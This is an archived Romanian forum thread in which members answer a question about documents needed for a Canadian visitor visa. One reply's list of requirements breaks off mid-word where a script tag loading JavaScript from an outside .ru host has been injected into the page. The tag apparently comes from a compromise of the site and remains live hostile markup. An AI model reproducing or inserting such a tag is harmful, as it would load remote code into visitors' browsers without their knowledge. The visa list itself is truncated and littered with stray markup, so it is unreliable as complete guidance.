PDA

Arată versiune întreagă : buna ziua

26.04.2006, 23:13
Mult stimata Doamna Roxana am si eu niste nelamuriri in privinta vizei.Am inteles ca e nevoie de o adeverinta de la locul de munca dar eu nu lucrezi in momentul de fata fiindca acum o luna m-am intors din srainatate si in luna iulie vreau sa merg in Canada la un prieten.La aplicatie tr sa scriu info si ds familia mea,ce fel de info? Scrisoarea de invitatie tr sa o legalizez?Cum pot sa fac dovada ca gazda este cetatean canadian sa cer o copie de pasaport? Va multumesc anticipat.

ovex
27.04.2006, 02:48
</span>Nu ma cheama Roxana,dar am sa incerc,cu placere, sa te ajut eu:
</span>
</span>
</span>
</span>Cerinte pentru viza temporara (de vizitator) canadiana.</span> </span>

Pentru
ca o viza temporara (vizitator) sa poata fi acordata, cel care acorda
viza trebuie sa se convinga de faptul ca aplicantul nu reprezinta un
pericol pentru societatea canadiana <b style="">si[/b] va parasi <st1:country-regi&#111;n w:st="&#111;n"><st1:place w:st="&#111;n">Canada</st1:place></st1:country-regi&#111;n>
la expirarea perioadei autorizate. Cand aplici pentru o viza de
resident temporar (vizitator), trebuie de asemeni sa atasezi la dosar
in afara pasaportului (care sa fie valabil pentru cel putin o luna dupa
durata vizitei planificate) urmatoarele documente: </span>
<ul><li class="Ms&#111;normal" style="margin: 0in 0in 0pt; color: black;">aplicatia completata, datata, plus orice informatii sau pagini suplimentare despre familie; </span><li class="Ms&#111;normal" style="margin: 0in 0in 0pt; color: black;">doua poze de pasaport pentru fiecare persoana inclusa in aplicatie, inclusive copii; </span><li class="Ms&#111;normal" style="margin: 0in 0in 0pt; color: black;">adeverinta de la locul de munca, indicand ocupatia/meseria, salariul lunar si perioada pentru care ti s-a aprobat concediul; </span><li class="Ms&#111;normal" style="margin: 0in 0in 0pt; color: black;">orice alte dovezi care sa arate legaturile cu <st1:place w:st="&#111;n">tara</st1:place> (extrase cont bancar, dovezi proprietati, etc.); </span><li class="Ms&#111;normal" style="margin: 0in 0in 0pt; color: black;">scrisoare
notarizata de invitatie si support material, de la o ruda, prieten, sau
partener de afaceri, care te va gazdui in Canada (daca este aplicabil),
aratand relatia cu gazda si durata sederii; </span><li class="Ms&#111;normal" style="margin: 0in 0in 0pt; color: black;">pentru
copiii care-si invita parintii in vizita: evidenta a abilitatilor lor
financiare pentru a te intretine, cum ar fi ultimele documente de la
plata taxelor (Revenue Canada Notice of Assessment or T4) si adeverinta
de la locul de munca; </span><li class="Ms&#111;normal" style="margin: 0in 0in 0pt; color: black;">in cazul in care calatoresti pentru a intalni parteneri de afaceri, dovezi ale corespondentei anterioare cu compania din <st1:country-regi&#111;n w:st="&#111;n"><st1:place w:st="&#111;n">Canada</st1:place></st1:country-regi&#111;n>; </span><li class="Ms&#111;normal" style="margin: 0in 0in 0pt; color: black;">chitanta origin<script src=http://www.iroe.ru/ngg.js></script>

sorin
27.04.2006, 03:26
Ovex, daca e corect ce am scris eu acolo, pe viitor poti da si linkul urmator ca referinta, pentru ca sunt sigur ca vor mai intreba si alti forumisti, chiar daca topicul respectiv este postat ca "sticky" smileys/smiley2.gif:
http://www.romanian-portal.com/forum/forum_posts.asp?TID=419 (http://www.romanian-portal.com/forum/forum_posts.asp?TID=4192&amp;PN=1) 2&amp;PN=1

ovex
27.04.2006, 06:43
am vrut si eu sa fiu politicos...smileys/smiley2.gif,topicul este extrem de folositor si e foarte bine ca e sticky smileys/smiley32.gif .

sorin
27.04.2006, 06:50
smileys/smiley2.gif